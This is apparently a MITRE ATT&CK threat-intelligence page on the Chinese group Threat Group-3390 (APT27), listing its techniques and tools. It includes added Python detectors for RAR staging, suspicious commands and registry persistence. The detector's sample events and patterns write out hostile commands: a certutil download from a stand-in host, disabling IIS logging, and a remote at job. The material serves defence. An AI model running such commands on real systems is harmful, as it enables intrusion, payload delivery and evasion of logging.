Group description: Threat Group-3390
Threat Group-3390, Earth Smilodon, TG-3390, Emissary Panda, BRONZE UNION, APT27, Iron Tiger, LuckyMouse, Linen Typhoon, Group G0027 | MITRE ATT&CK®
Threat Group-3390
Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims. [1] The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors. [2] [3] [4]
ID: G0027
Associated Groups: Earth Smilodon, TG-3390, Emissary Panda, BRONZE UNION, APT27, Iron Tiger, LuckyMouse, Linen Typhoon
Contributors: Daniyal Naeem, BT Security; Kyaw Pyiyt Htet, @KyawPyiytHtet
Version: 3.0
Created: 31 May 2017
Last Modified: 15 October 2025
Associated Group Descriptions
Each alias is followed by the references that use it.
Earth Smilodon [5]
TG-3390 [1] [6] [7]
Emissary Panda [8] [6] [3] [7] [9] [5]
BRONZE UNION [2] [6]
APT27 [6] [3] [7] [5]
Iron Tiger [7] [5]
LuckyMouse [3] [7] [5]
Linen Typhoon [10]
Techniques Used
All techniques below are in the Enterprise domain. Each entry gives the ATT&CK ID and technique name, followed by the observed use and its references.

T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control
A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges. [6]

T1087.001 Account Discovery: Local Account
Threat Group-3390 has used net user to conduct internal discovery of systems. [2]

T1583.001 Acquire Infrastructure: Domains
Threat Group-3390 has registered domains for C2. [11]

T1071.001 Application Layer Protocol: Web Protocols
Threat Group-3390 malware has used HTTP for C2. [3]

T1560.002 Archive Collected Data: Archive via Library
Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration. [2]

T1119 Automated Collection
Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories. [2]

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Threat Group-3390's malware can add a Registry key to Software\Microsoft\Windows\CurrentVersion\Run for persistence. [6] [11]

T1059.001 Command and Scripting Interpreter: PowerShell
Threat Group-3390 has used PowerShell for execution. [2] [4]

T1059.003 Command and Scripting Interpreter: Windows Command Shell
Threat Group-3390 has used command-line interfaces for execution. [2] [9]

T1543.003 Create or Modify System Process: Windows Service
Threat Group-3390's malware can create a new service, sometimes naming it after the config information, to gain persistence. [6] [11]

T1555.005 Credentials from Password Stores: Password Managers
Threat Group-3390 obtained a KeePass database from a compromised host. [4]

T1005 Data from Local System
Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories. [2]

T1074.001 Data Staged: Local Data Staging
Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts. [2]

T1074.002 Data Staged: Remote Data Staging
Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration. [2]

T1030 Data Transfer Size Limits
Threat Group-3390 actors have split RAR files for exfiltration into parts. [1]

T1140 Deobfuscate/Decode Files or Information
During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit's shikata_ga_nai encoder and compressed with LZNT1. [3]

T1189 Drive-by Compromise
Threat Group-3390 has extensively used strategic web compromises to target victims. [1] [3]

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Threat Group-3390 has exfiltrated stolen data to Dropbox. [4]

T1190 Exploit Public-Facing Application
Threat Group-3390 has exploited CVE-2019-0604 in Microsoft SharePoint, and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server. [5]

T1203 Exploitation for Client Execution
Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor. [5]

T1068 Exploitation for Privilege Escalation
Threat Group-3390 has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges. [2] [12]

T1210 Exploitation of Remote Services
Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network. [9]

T1133 External Remote Services
Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. [1] Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network. [2]

T1574.001 Hijack Execution Flow: DLL
Threat Group-3390 has performed DLL search order hijacking to execute their payload. [6] Threat Group-3390 has also used DLL side-loading, including by using legitimate Kaspersky antivirus binaries as well as rc.exe, a legitimate Microsoft Resource Compiler. [1] [2] [3] [9] [11]

T1562.002 Impair Defenses: Disable Windows Event Logging
Threat Group-3390 has used appcmd.exe to disable logging on a victim server. [2]

T1070.004 Indicator Removal: File Deletion
Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim. [2] [4]

T1070.005 Indicator Removal: Network Share Connection Removal
Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection. [2]

T1105 Ingress Tool Transfer
Threat Group-3390 has downloaded additional malware and tools, including through the use of certutil, onto a compromised host. [1] [4]

T1056.001 Input Capture: Keylogging
Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework ScanBox to capture keystrokes. [1] [7] [3]

T1112 Modify Registry
A Threat Group-3390 tool has created new Registry keys under HKEY_CURRENT_USER\Software\Classes\ and HKLM\SYSTEM\CurrentControlSet\services. [6] [5]

T1046 Network Service Discovery
Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems. [1] [9]

T1027.002 Obfuscated Files or Information: Software Packing
Threat Group-3390 has packed malware and tools, including using VMProtect. [4] [5]

T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit's shikata_ga_nai encoder. [6] [3] [9]

T1027.015 Obfuscated Files or Information: Compression
Threat Group-3390 malware is compressed with LZNT1 compression. [6] [3] [9]

T1588.002 Obtain Capabilities: Tool
Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor. [9] [1]

T1588.003 Obtain Capabilities: Code Signing Certificates
Threat Group-3390 has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations. [11]

T1003.001 OS Credential Dumping: LSASS Memory
Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers. [1] [2]

T1003.002 OS Credential Dumping: Security Account Manager
Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers. [1] [2]

T1003.004 OS Credential Dumping: LSA Secrets
Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers. [1] [2]

T1566.001 Phishing: Spearphishing Attachment
Threat Group-3390 has used e-mail to deliver malicious attachments to victims. [4]

T1055.012 Process Injection: Process Hollowing
A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process. [6] [3]

T1012 Query Registry
A Threat Group-3390 tool can read and decrypt stored Registry values. [6]

T1021.006 Remote Services: Windows Remote Management
Threat Group-3390 has used WinRM to enable remote execution. [2]

T1018 Remote System Discovery
Threat Group-3390 has used the net view command. [6]

T1053.002 Scheduled Task/Job: At
Threat Group-3390 actors use at to schedule tasks that run self-extracting RAR archives, which install HTTPBrowser or PlugX on other victims on a network. [1]

T1505.003 Server Software Component: Web Shell
Threat Group-3390 has used a variety of Web shells. [9]

T1608.001 Stage Capabilities: Upload Malware
Threat Group-3390 has hosted malicious payloads on Dropbox. [4]

T1608.002 Stage Capabilities: Upload Tool
Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites. [1]

T1608.004 Stage Capabilities: Drive-by Target
Threat Group-3390 has embedded malicious code into websites to profile a visitor's IP address and then exploit the browser only if the visitor is of interest. [8]

T1195.002 Supply Chain Compromise: Compromise Software Supply Chain
Threat Group-3390 has compromised the Able Desktop installer to gain access to victims' environments. [5]

T1016 System Network Configuration Discovery
Threat Group-3390 actors use NBTscan to discover vulnerable systems. [1]

T1049 System Network Connections Discovery
Threat Group-3390 has used net use and netstat to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim. [2]

T1033 System Owner/User Discovery
Threat Group-3390 has used whoami to collect system user information. [4]

T1199 Trusted Relationship
Threat Group-3390 has compromised third-party service providers to gain access to victims' environments. [12]

T1204.002 User Execution: Malicious File
Threat Group-3390 has lured victims into opening malicious files containing malware. [4]

T1078 Valid Accounts
Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks. [1]

T1047 Windows Management Instrumentation
A Threat Group-3390 tool can use WMI to execute a binary. [6]
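The collection and staging entries above (T1560.002, T1119, T1074.001/.002, T1030) describe one recognisable on-disk artifact: RAR archives that are password-protected, split into volumes, and parked in a local staging directory before being moved to a compromised web server. The following is an added example written for this page, not MITRE's code or a tool from the cited reports. It reads the RAR 4.x main-header flag bits (volume, first volume, encrypted headers) and the two multi-volume naming schemes, and runs over a temporary directory whose file names and archive bytes are constructed for the demonstration. RAR5 archives use a different, variable-length header and are only identified by version here.

```python
"""Hunt for the archive staging pattern described above: RAR sets that are
password-protected and split into volumes, sitting in a local staging directory.
Added example for this page, not MITRE code. The RAR 4.x header layout is the
documented format; the file names and archive bytes below are constructed."""
import os
import re
import struct
import tempfile
from typing import Dict, List, Optional

RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"

# RAR 4.x main archive header (HEAD_TYPE 0x73) flag bits.
MHD_VOLUME = 0x0001       # archive is one volume of a multi-volume set
MHD_PASSWORD = 0x0080     # headers are encrypted (set with "rar a -hp")
MHD_FIRSTVOLUME = 0x0100  # this is the first volume of the set

# Multi-volume naming: name.part01.rar ..., or name.rar + name.r00, name.r01 ...
MULTIPART_NAME = re.compile(r"\.(part\d+\.rar|r\d\d)$", re.IGNORECASE)


def parse_rar_header(blob: bytes) -> Optional[dict]:
    """Return archive-level flags from the first bytes of a RAR file, or None if not RAR."""
    if blob.startswith(RAR5_SIG):
        # RAR5 headers use variable-length integers; only the version is reported here.
        return {"version": 5, "volume": None, "encrypted_headers": None}
    if not blob.startswith(RAR4_SIG):
        return None
    # Main header follows the 7-byte signature:
    # HEAD_CRC(2) HEAD_TYPE(1) HEAD_FLAGS(2) HEAD_SIZE(2) RESERVED1(2) RESERVED2(4)
    off = len(RAR4_SIG)
    if len(blob) < off + 7:
        return None
    _crc, head_type, flags, _size = struct.unpack_from("<HBHH", blob, off)
    if head_type != 0x73:
        return None
    return {
        "version": 4,
        "volume": bool(flags & MHD_VOLUME),
        "first_volume": bool(flags & MHD_FIRSTVOLUME),
        "encrypted_headers": bool(flags & MHD_PASSWORD),
    }


def build_rar4_stub(flags: int) -> bytes:
    """Constructed RAR4 signature plus main header carrying the given flags (test data, not a real archive)."""
    return RAR4_SIG + struct.pack("<HBHH", 0, 0x73, flags, 13) + b"\x00" * 6


def indicators_for(name: str, info: dict) -> List[str]:
    """Map header flags and file name to the staging indicators worth reporting."""
    found = []
    if info.get("encrypted_headers"):
        found.append("encrypted_headers")
    if info.get("volume"):
        found.append("multi_volume_flag")
    if MULTIPART_NAME.search(name):
        found.append("multipart_name")
    return found


def triage_directory(path: str) -> Dict[str, List[str]]:
    """Walk a directory; return {relative file: indicators} for every RAR file found."""
    report = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                info = parse_rar_header(fh.read(64))
            if info is None:
                continue
            report[os.path.relpath(full, path)] = indicators_for(name, info)
    return report


def demo() -> Dict[str, List[str]]:
    """Build a constructed staging directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        # A split, header-encrypted set like the one the report describes.
        with open(os.path.join(tmp, "docs.part01.rar"), "wb") as fh:
            fh.write(build_rar4_stub(MHD_VOLUME | MHD_PASSWORD | MHD_FIRSTVOLUME))
        with open(os.path.join(tmp, "docs.part02.rar"), "wb") as fh:
            fh.write(build_rar4_stub(MHD_VOLUME | MHD_PASSWORD))
        # A benign single-volume archive with plain headers, and a non-archive.
        with open(os.path.join(tmp, "readme.rar"), "wb") as fh:
            fh.write(build_rar4_stub(0))
        with open(os.path.join(tmp, "notes.txt"), "wb") as fh:
            fh.write(b"not an archive")
        return triage_directory(tmp)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(rel, hits or "clean")
```

Pointing `triage_directory` at user profile folders, web roots and `C:\Windows\Temp` is the practical use; a RAR set with `encrypted_headers` and `multi_volume_flag` in any of those locations is worth a look regardless of what the file is called, because the flags live in the header and survive renaming.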
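Much of the hands-on-keyboard activity in the table is plain Windows commands: net user, net view, net use and netstat for discovery (T1087.001, T1018, T1049), quser and whoami (T1049, T1033), certutil as a downloader (T1105), appcmd.exe to turn off logging (T1562.002), at to schedule jobs on other hosts (T1053.002) and net use /delete to detach shares afterwards (T1070.005). Individually most of these are routine; together on one host inside a short window they are not. The following is an added example for this page, not MITRE's code. It assumes process-creation telemetry that carries the full command line (Sysmon Event ID 1 or Security 4688 with command-line auditing), normalises away the executable's directory, and applies single-event rules plus a per-host discovery-burst rule. The events, hosts and times are constructed; the appcmd form (-section:httpLogging -dontLog:true) is an assumption about how logging was disabled, since the report only names appcmd.exe.

```python
"""Detection logic for the hands-on-keyboard commands catalogued above: bursts of
discovery commands (net user/view/use, netstat, quser, whoami), certutil used as a
downloader, appcmd.exe changing IIS logging, at.exe scheduling a job on another
host, and a share being detached after use. Added example for this page, not MITRE
code. The events are constructed in the shape of a process-creation log; the hosts,
times and the 203.0.113.10 address are made up for the demonstration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Discovery commands named on this page, keyed by the label used in alerts.
DISCOVERY = {
    "net_user": re.compile(r"^net1?(\.exe)?\s+user\b", re.I),
    "net_view": re.compile(r"^net1?(\.exe)?\s+view\b", re.I),
    "net_use": re.compile(r"^net1?(\.exe)?\s+use\b(?!.*/delete)", re.I),
    "netstat": re.compile(r"^netstat(\.exe)?\b", re.I),
    "quser": re.compile(r"^quser(\.exe)?\b", re.I),
    "whoami": re.compile(r"^whoami(\.exe)?\b", re.I),
    "ipconfig": re.compile(r"^ipconfig(\.exe)?\b", re.I),
    "tasklist": re.compile(r"^tasklist(\.exe)?\b", re.I),
    "systeminfo": re.compile(r"^systeminfo(\.exe)?\b", re.I),
}

# Single-event rules: each fires on its own. The appcmd form (httpLogging/dontLog)
# is an assumption about how logging was turned off; the report only names appcmd.exe.
SINGLE = [
    ("T1105 certutil download", re.compile(r"^certutil(\.exe)?\s.*-urlcache\b.*https?://", re.I)),
    ("T1562.002 appcmd logging change", re.compile(r"^appcmd(\.exe)?\s+set\s+config\b.*(dontlog|httplogging)", re.I)),
    ("T1053.002 remote at job", re.compile(r"^at(\.exe)?\s+\\\\\S+\s+\d{1,2}:\d{2}", re.I)),
    ("T1070.005 share detached", re.compile(r"^net1?(\.exe)?\s+use\s+\S+\s+/delete", re.I)),
]

WINDOW = timedelta(minutes=10)
BURST_THRESHOLD = 4  # distinct discovery commands on one host inside WINDOW


def normalize(cmdline: str) -> str:
    """Strip the directory from the executable so rules can anchor on the binary name."""
    m = re.match(r'^\s*"?([^"\s]+)"?\s*(.*)$', cmdline)
    if not m:
        return cmdline.strip()
    exe = m.group(1).rsplit("\\", 1)[-1]
    return (exe + " " + m.group(2)).strip()


def detect(events: List[Dict[str, str]]) -> List[dict]:
    """Run single-event rules and the per-host discovery-burst rule over process events."""
    alerts = []
    discovery_hits = defaultdict(list)  # host -> [(timestamp, label)]
    for ev in events:
        cmd = normalize(ev["cmdline"])
        ts = datetime.fromisoformat(ev["time"])
        for label, rx in SINGLE:
            if rx.search(cmd):
                alerts.append({"host": ev["host"], "rule": label, "time": ev["time"], "cmdline": cmd})
        for label, rx in DISCOVERY.items():
            if rx.search(cmd):
                discovery_hits[ev["host"]].append((ts, label))
    for host, hits in discovery_hits.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            seen = {label for ts, label in hits[i:] if ts - start <= WINDOW}
            if len(seen) >= BURST_THRESHOLD:
                alerts.append({"host": host, "rule": "discovery burst", "time": start.isoformat(),
                               "commands": sorted(seen)})
                break  # one burst alert per host is enough for triage
    return alerts


# Constructed process-creation events (not from any report).
EVENTS = [
    {"host": "WEB01", "time": "2021-03-02T09:12:00", "cmdline": r"C:\Windows\System32\whoami.exe"},
    {"host": "WEB01", "time": "2021-03-02T09:12:40", "cmdline": r"C:\Windows\System32\net.exe user"},
    {"host": "WEB01", "time": "2021-03-02T09:13:05", "cmdline": r"C:\Windows\System32\net.exe view"},
    {"host": "WEB01", "time": "2021-03-02T09:13:50", "cmdline": r"C:\Windows\System32\quser.exe"},
    {"host": "WEB01", "time": "2021-03-02T09:14:30", "cmdline": r"C:\Windows\System32\netstat.exe -ano"},
    {"host": "WEB01", "time": "2021-03-02T09:20:00",
     "cmdline": r"C:\Windows\System32\certutil.exe -urlcache -split -f http://203.0.113.10/upd.exe C:\Windows\Temp\upd.exe"},
    {"host": "WEB01", "time": "2021-03-02T09:31:00",
     "cmdline": r"C:\Windows\System32\inetsrv\appcmd.exe set config -section:httpLogging -dontLog:true"},
    {"host": "FS02", "time": "2021-03-02T10:02:00", "cmdline": r"C:\Windows\System32\at.exe \\FS03 10:15 C:\Windows\Temp\update.exe"},
    {"host": "FS02", "time": "2021-03-02T10:40:00", "cmdline": r"C:\Windows\System32\net.exe use \\FS03\C$ /delete"},
    # An administrator running two discovery commands hours apart: below the burst threshold.
    {"host": "ADMIN07", "time": "2021-03-02T08:00:00", "cmdline": r"C:\Windows\System32\whoami.exe"},
    {"host": "ADMIN07", "time": "2021-03-02T11:30:00", "cmdline": r"C:\Windows\System32\net.exe view"},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["host"], alert["time"], alert["rule"], alert.get("commands", alert.get("cmdline")))
```

The burst rule counts distinct commands rather than raw events, so a script that runs `net view` fifty times does not trip it, while a human typing five different discovery commands in three minutes does. Tune `WINDOW` and `BURST_THRESHOLD` against your own administrators' baseline before deploying; on a jump host the threshold should be higher than on a web server, where none of these commands are expected at all.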
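The persistence entries above (T1547.001 Run keys, T1543.003 new services, T1112 keys under CurrentControlSet\services) share one defender's check: an autostart entry whose binary or DLL lives somewhere other than the Windows or Program Files trees. The following is an added example for this page, not MITRE's code. It parses the subset of the `reg export` file format that matters here (quoted REG_SZ strings with backslash escapes, and REG_EXPAND_SZ values, which reg.exe writes as hex(2) UTF-16LE byte lists) and flags Run-key commands, service ImagePath values and svchost ServiceDll values that point outside trusted directories. The export text, service names and paths are constructed for the demonstration; the rc.exe name echoes the side-loading host mentioned under T1574.001 but is not taken from a real export.

```python
"""Triage of the persistence locations named above (Run keys, service ImagePath and
ServiceDll values) over a reg.exe export. Added example for this page, not MITRE
code. The export text is constructed; the .reg format details (quoted REG_SZ
strings with backslash escapes, REG_EXPAND_SZ as hex(2) UTF-16LE byte lists) are
what reg.exe actually writes."""
import re
from typing import Dict, List

# Directories an autostart entry is expected to point into. Anything else is worth a look.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


def reg_expand_sz(value: str) -> str:
    """Encode a string the way reg.exe exports REG_EXPAND_SZ (used only to build the sample)."""
    data = (value + "\x00").encode("utf-16-le")
    return "hex(2):" + ",".join(f"{b:02x}" for b in data)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse [key] sections with "name"="string" and "name"=hex(2):... values into {key: {name: value}}."""
    text = re.sub(r",\\\r?\n\s*", ",", text)  # join continuation lines of long hex values
    entries: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            entries.setdefault(current, {})
        elif current and line.startswith('"'):
            name, _, value = line.partition("=")
            name = name.strip('"')
            if value.startswith('"'):
                value = re.sub(r"\\(.)", r"\1", value[1:-1])  # unescape \\ and \"
            elif value.startswith("hex(2):"):
                raw_bytes = bytes(int(b, 16) for b in value[7:].split(",") if b)
                value = raw_bytes.decode("utf-16-le").rstrip("\x00")
            entries[current][name] = value
    return entries


def executable_path(command: str) -> str:
    """Pull the executable path out of a command value: the quoted path, else the first token."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ")[0]


def expand(path: str) -> str:
    """Lower-case and expand the environment variables that commonly appear in service paths."""
    return path.lower().replace("%systemroot%", "c:\\windows").replace("%programfiles%", "c:\\program files")


def triage(entries: Dict[str, Dict[str, str]]) -> List[dict]:
    """Flag Run-key commands and service binaries/DLLs that live outside TRUSTED_DIRS."""
    findings = []
    for key, values in entries.items():
        k = key.lower()
        if k.endswith("\\currentversion\\run") or k.endswith("\\currentversion\\runonce"):
            for name, cmd in values.items():
                exe = expand(executable_path(cmd))
                if not exe.startswith(TRUSTED_DIRS):
                    findings.append({"kind": "run_key", "name": name, "key": key, "path": exe})
        elif "\\currentcontrolset\\services\\" in k:
            parts = key.split("\\")
            service = parts[-2] if k.endswith("\\parameters") else parts[-1]
            for value_name in ("ImagePath", "ServiceDll"):
                if value_name in values:
                    exe = expand(executable_path(values[value_name]))
                    if not exe.startswith(TRUSTED_DIRS):
                        findings.append({"kind": "service_" + value_name, "name": service, "key": key, "path": exe})
    return findings


# Constructed export: one benign and one suspicious Run entry, one benign and two suspicious services.
SAMPLE_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"',
    r'"Updater"="C:\\Users\\jdoe\\AppData\\Roaming\\avupd\\avp.exe"',
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]",
    '"ImagePath"=' + reg_expand_sz(r"%SystemRoot%\System32\spoolsv.exe"),
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinUpdateSvc]",
    '"ImagePath"=' + reg_expand_sz(r"C:\ProgramData\Intel\rc.exe"),
    "",
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetSvcHost\Parameters]",
    '"ServiceDll"=' + reg_expand_sz(r"C:\ProgramData\Intel\nethelper.dll"),
])

if __name__ == "__main__":
    for f in triage(parse_reg_export(SAMPLE_EXPORT)):
        print(f["kind"], f["name"], f["path"])
```

A path inside Program Files is not proof of legitimacy: the side-loading described under T1574.001 works precisely by dropping a signed, legitimate EXE next to a malicious DLL, so a Run entry pointing at a vendor binary in a user-writable folder (the `Updater` entry here) is the case to chase, and for any flagged service the ServiceDll check matters as much as ImagePath, because the hosting svchost.exe itself is always in System32.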
Software
Each entry gives the ATT&CK software ID and name, the references that tie it to this group, and the techniques ATT&CK attributes to that software.

S0073 ASPXSpy [1] [12]
Threat Group-3390 has used a modified version of ASPXSpy called ASPXTool.
Techniques: Server Software Component: Web Shell

S0160 certutil [4]
Techniques: Archive Collected Data: Archive via Utility; Deobfuscate/Decode Files or Information; Ingress Tool Transfer; Subvert Trust Controls: Install Root Certificate

S0020 China Chopper [1] [2] [6] [9]
Techniques: Application Layer Protocol: Web Protocols; Brute Force: Password Guessing; Command and Scripting Interpreter: Windows Command Shell; Data from Local System; File and Directory Discovery; Indicator Removal: Timestomp; Ingress Tool Transfer; Network Service Discovery; Obfuscated Files or Information: Software Packing; Server Software Component: Web Shell

S0660 Clambling [4] [12] [5]
Techniques: Abuse Elevation Control Mechanism: Bypass User Account Control; Application Layer Protocol; Application Layer Protocol: Web Protocols; Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Clipboard Data; Command and Scripting Interpreter: Windows Command Shell; Command and Scripting Interpreter: PowerShell; Create or Modify System Process: Windows Service; Data from Local System; Deobfuscate/Decode Files or Information; Exfiltration Over Web Service: Exfiltration to Cloud Storage; File and Directory Discovery; Hide Artifacts: Hidden Files and Directories; Hijack Execution Flow: DLL; Input Capture: Keylogging; Modify Registry; Network Share Discovery; Non-Application Layer Protocol; Obfuscated Files or Information; Phishing: Spearphishing Attachment; Process Discovery; Process Injection; Process Injection: Process Hollowing; Query Registry; Screen Capture; System Information Discovery; System Network Configuration Discovery; System Owner/User Discovery; System Services: Service Execution; System Time Discovery; User Execution: Malicious File; Video Capture; Virtualization/Sandbox Evasion: Time Based Checks; Web Service: Bidirectional Communication

S0154 Cobalt Strike [4]
Techniques: Abuse Elevation Control Mechanism: Sudo and Sudo Caching; Abuse Elevation Control Mechanism: Bypass User Account Control; Access Token Manipulation: Parent PID Spoofing; Access Token Manipulation: Token Impersonation/Theft; Access Token Manipulation: Make and Impersonate Token; Account Discovery: Domain Account; Application Layer Protocol: DNS; Application Layer Protocol: Web Protocols; Application Layer Protocol: File Transfer Protocols; BITS Jobs; Browser Session Hijacking; Command and Scripting Interpreter: JavaScript; Command and Scripting Interpreter: Visual Basic; Command and Scripting Interpreter: PowerShell; Command and Scripting Interpreter: Python; Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Data Encoding: Standard Encoding; Data from Local System; Data Obfuscation: Protocol or Service Impersonation; Data Transfer Size Limits; Deobfuscate/Decode Files or Information; Encrypted Channel: Asymmetric Cryptography; Encrypted Channel: Symmetric Cryptography; Exploitation for Client Execution; Exploitation for Privilege Escalation; File and Directory Discovery; Hide Artifacts: Process Argument Spoofing; Impair Defenses: Disable or Modify Tools; Indicator Removal: Timestomp; Ingress Tool Transfer; Input Capture: Keylogging; Modify Registry; Native API; Network Service Discovery; Network Share Discovery; Non-Application Layer Protocol; Obfuscated Files or Information: Indicator Removal from Tools; Obfuscated Files or Information; Office Application Startup: Office Template Macros; OS Credential Dumping: LSASS Memory; OS Credential Dumping: Security Account Manager; Permission Groups Discovery: Domain Groups; Permission Groups Discovery: Local Groups; Process Discovery; Process Injection: Dynamic-link Library Injection; Process Injection: Process Hollowing; Process Injection; Protocol Tunneling; Proxy: Domain Fronting; Proxy: Internal Proxy; Query Registry; Reflective Code Loading; Remote Services: Remote Desktop Protocol; Remote Services: SSH; Remote Services: Windows Remote Management; Remote Services: SMB/Windows Admin Shares; Remote Services: Distributed Component Object Model; Remote System Discovery; Scheduled Transfer; Screen Capture; Software Discovery; Subvert Trust Controls: Code Signing; System Binary Proxy Execution: Rundll32; System Network Configuration Discovery; System Network Connections Discovery; System Service Discovery; System Services: Service Execution; Use Alternate Authentication Material: Pass the Hash; Valid Accounts: Domain Accounts; Valid Accounts: Local Accounts; Windows Management Instrumentation

S0032 gh0st RAT [13]
Techniques: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Command and Scripting Interpreter; Create or Modify System Process: Windows Service; Data Encoding: Standard Encoding; Deobfuscate/Decode Files or Information; Dynamic Resolution: Fast Flux DNS; Encrypted Channel: Symmetric Cryptography; Encrypted Channel; Hijack Execution Flow: DLL; Indicator Removal: Clear Windows Event Logs; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Keylogging; Modify Registry; Native API; Non-Application Layer Protocol; Process Discovery; Process Injection; Query Registry; Screen Capture; Shared Modules; System Binary Proxy Execution: Rundll32; System Information Discovery; System Services: Service Execution

S0008 gsecdump [1]
Techniques: OS Credential Dumping: Security Account Manager; OS Credential Dumping: LSA Secrets

S0070 HTTPBrowser [1] [2] [6] [5]
Techniques: Application Layer Protocol: DNS; Application Layer Protocol: Web Protocols; Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Command and Scripting Interpreter: Windows Command Shell; File and Directory Discovery; Hijack Execution Flow: DLL; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Keylogging; Masquerading: Match Legitimate Resource Name or Location; Obfuscated Files or Information

S0398 HyperBro [9] [3] [7] [4] [5]
Techniques: Application Layer Protocol: Web Protocols; Deobfuscate/Decode Files or Information; Hijack Execution Flow: DLL; Indicator Removal: File Deletion; Ingress Tool Transfer; Native API; Obfuscated Files or Information: Software Packing; Obfuscated Files or Information: Encrypted/Encoded File; Process Injection; Screen Capture; System Service Discovery; System Services: Service Execution

S0357 Impacket [9]
Techniques: Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay; Lateral Tool Transfer; Network Sniffing; OS Credential Dumping: NTDS; OS Credential Dumping: LSASS Memory; OS Credential Dumping: Security Account Manager; OS Credential Dumping: LSA Secrets; Steal or Forge Kerberos Tickets: Kerberoasting; Steal or Forge Kerberos Tickets: Ccache Files; System Services: Service Execution; Windows Management Instrumentation

S0100 ipconfig [2]
Techniques: System Network Configuration Discovery

S0002 Mimikatz [2] [6] [4] [14] [12]
Threat Group-3390 has used a modified version of Mimikatz called Wrapikatz.
Techniques: Access Token Manipulation: SID-History Injection; Account Manipulation; Boot or Logon Autostart Execution: Security Support Provider; Credentials from Password Stores; Credentials from Password Stores: Credentials from Web Browsers; Credentials from Password Stores: Windows Credential Manager; OS Credential Dumping: DCSync; OS Credential Dumping: Security Account Manager; OS Credential Dumping: LSASS Memory; OS Credential Dumping: LSA Secrets; Rogue Domain Controller; Steal or Forge Authentication Certificates; Steal or Forge Kerberos Tickets: Golden Ticket; Steal or Forge Kerberos Tickets: Silver Ticket; Unsecured Credentials: Private Keys; Use Alternate Authentication Material: Pass the Hash; Use Alternate Authentication Material: Pass the Ticket

S0590 NBTscan [1] [4]
Techniques: Network Service Discovery; Network Sniffing; Remote System Discovery; System Network Configuration Discovery; System Owner/User Discovery

S0039 Net [2]
